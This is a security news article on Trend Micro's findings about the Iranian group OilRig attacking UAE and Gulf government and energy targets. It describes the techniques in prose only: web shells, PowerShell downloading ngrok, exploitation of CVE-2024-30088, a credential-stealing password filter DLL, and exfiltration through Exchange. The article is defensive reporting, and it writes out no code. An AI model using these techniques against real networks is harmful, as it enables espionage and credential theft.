OilRig Intensifies Cyberattacks on Critical Infra. in the Gulf

Ongoing cyber espionage activities attributed to the threat group OilRig (aka APT34, COBALT GYPSY, Earth Simnavaz, EUROPIUM, Evasive Serpens, Hazel Sandstorm, Helix Kitten, and IRN2) have been uncovered by Trend Micro researchers. Heightened concern regarding this group, linked to Iranian state interests, is due to the active targeting of critical sectors, including government and energy, particularly in the United Arab Emirates (UAE) and the broader Gulf region. The group's main objective is to exfiltrate sensitive information from key sectors vital to national security and economic stability. "There has been a notable rise in cyberattacks attributed to this APT group, specifically targeting government sectors in the UAE and the broader Gulf region," reports Trend Micro, emphasizing the group's focus on exploiting vulnerabilities in critical infrastructure. The group's use of compromised organizations as a launchpad for supply chain attacks on other governmental entities is of added concern, further broadening their reach.

OilRig employs customized .NET tools and IIS-based malware designed to blend malicious activity with regular network traffic, making detection difficult. The attack chain observed by Trend Micro threat researchers and incident response analysts typically begins with uploading a web shell to vulnerable web servers. This shell allows the execution of PowerShell commands, which drop further malicious payloads onto the compromised systems. A sample PowerShell script was found using the 'Invoke-WebRequest' cmdlet to download the ngrok tool, followed by calling WMI to initiate its execution. Ngrok is leveraged to establish a tunnel, enabling lateral movement across the compromised environment. To escalate privileges, the attackers exploit a Windows Kernel Elevation of Privilege vulnerability, CVE-2024-30088. In addition to exploiting CVE-2024-30088 for privilege escalation, OilRig drops a password filter DLL on compromised systems. This allows the threat actors to extract and exfiltrate plaintext credentials, which are then used to pivot through the victim's network.

OilRig uses compromised Exchange servers to exfiltrate data in one of the more complex techniques observed. According to Trend Micro, "The threat actors leverage legitimate accounts with stolen passwords to route these emails through government Exchange Servers." This ensures that sensitive information is exfiltrated without raising immediate suspicion. Trend Micro researchers noted similarities between the backdoor used in this campaign and one seen in previous operations attributed to the same group. OilRig has refined and reused its methods across different targets. Attribution of this attack to OilRig was made based on the use of tools like ngrok and backdoors employed in the campaign. Trend Micro notes a "significant similarity has been observed at both the code and functionality levels between the Exchange backdoor used in this attack and the one seen in the earlier campaign."

Organizations in geopolitically sensitive regions, especially in the Gulf, should remain vigilant and prioritize mitigating vulnerabilities such as CVE-2024-30088. Evidence of this CVE's exploitation prompted its addition to CISA's Known Exploited Vulnerabilities (KEV) catalog on October 15, 2024. CISA urges organizations to patch the affected systems and address any other vulnerabilities listed in the KEV catalog promptly.